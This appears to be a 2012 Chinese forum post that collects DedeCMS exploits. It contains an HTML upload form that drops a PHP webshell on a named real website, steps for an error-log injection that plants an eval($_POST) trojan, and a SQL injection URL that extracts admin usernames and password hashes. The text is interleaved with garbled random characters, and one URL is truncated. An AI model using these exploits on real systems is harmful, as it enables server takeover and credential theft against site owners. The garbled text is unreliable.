7 a' _' q1 F; {/ k: K& H" S' [3 B<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>! I! J$ m2 j/ q5 X. ]6 t
</head>
5 A1 U8 h8 N% q/ j" z0 E; q<body style="FONT-SIZE: 9pt">: B; p" R6 L0 h
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
- f- x0 M3 Q( O) x<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>% [" c$ @* O* q, _* @! ]
<input type='hidden' name='activepath' value='/data/cache/' />. _. d6 ~$ {7 e; r+ y6 k$ P
<input type='hidden' name='cfg_basedir' value='../../' />
: B$ s8 Y! H: m<input type='hidden' name='cfg_imgtype' value='php' />( W+ h) y1 t0 ]9 _
<input type='hidden' name='cfg_not_allowall' value='txt' />
; l4 s) Q; x# |$ D<input type='hidden' name='cfg_softtype' value='php' />0 x6 F+ t) v0 f/ k% ?, r
<input type='hidden' name='cfg_mediatype' value='php' />
- s' E5 p; i3 i, h( D<input type='hidden' name='f' value='form1.enclosure' />
( k6 \5 z$ {6 H" n) K3 c( E& |<input type='hidden' name='job' value='upload' />
, ]$ a7 x3 m* L' ?) w<input type='hidden' name='newname' value='fly.php' />6 C& O4 [: c/ I# S: F
Select U Shell <input type='file' name='uploadfile' size='25' />; N: s) k- ]4 h1 o" M$ X2 H
<input type='submit' name='sb1' value='确定' />
" n" b5 p4 G) P</form>
# x9 K8 v0 p6 ^2 `" h<br />It's just a exp for the bug of Dedecms V55...<br />
5 }* o+ Y, v, e3 ~# DNeed register_globals = on...<br />! E3 p j, q- v+ \0 j: i/ H
Fun the game,get a webshell at /data/cache/fly.php...<br />2 U3 o; y/ G6 f
</body>; [4 Y. E2 q" R
</html>
; w1 W" \& b9 R; {1 B8 R4 o/ `0 L+ y8 }+ x4 F
8 q: A* S8 Y" l1 s6 X0 Z
" t c) S5 n9 V; b6 U& W0 J
2 g6 J, B& t0 g! _3 |" ~2 f' Y8 W) ^% |1 x9 g
: X( o' H- r. A/ w
& @: ~! j: g8 p9 w4 t' {
# N6 S3 K# u3 p9 O0 s* l2 e% o7 x. D3 a
$ w( O; ?6 W0 E* z7 @/ u! T
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
( u' I2 Q* Y2 ~; D' w$ d U3 _利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
4 R: G' W! Y, U8 Y) P% l4 i, g. H1. 访问网址:4 H7 I! A- f0 S& t+ r
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
! o- p) C9 M( I" m' ^可看见错误信息
$ I# _( @1 l( e) e1 d1 Q# a4 u# ]* K- v
- N @5 V! T( W2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。: o" L3 p) i/ e0 u
int(3) Error: Illegal double '1024e1024' value found during parsing8 h& h8 g5 {# P" p) ` V" F5 |6 `4 ?
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
: e+ p2 d* f% s/ s( j- G
8 C) T& N% {- W d. C8 k8 A
9 Q! s5 d# u8 f: ^" K' z& M: I6 |3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是! `6 f" {+ n- D+ }
0 T4 @8 n* [! E1 `
2 _! z7 F; }# C1 j1 k! \
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>8 j7 N; m" X5 K5 k H
7 {- L4 i7 N9 }5 {
5 J% m9 n$ o2 G6 T! ]& ~. o& k按确定后的看到第2步骤的信息表示文件木马上传成功.
* E+ `5 V4 p3 w3 J) W
# S3 e' D* {; E
1 o' S/ q" r: ~/ p0 s" x
& q7 |8 f/ d( V- x5 h
5 u3 v2 ^+ a9 F. u) ~
. W, w$ y q5 [' n7 \& u! L" x5 {5 h2 r$ G" y: J
0 m9 f# _- |/ A h5 V" y( _
( E" u4 q# n" U0 P, P3 g: ^# _2 C
t, B) O/ Y( J: I$ X/ Z$ U; h
5 ?. f: q& d4 R, `0 W' a; W9 p+ l: @6 T- q
& q+ F( t- ^9 `' d; Z. U9 _织梦(DedeCms)plus/infosearch.php 文件注入漏洞, c5 T: W. P5 D+ b- i
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对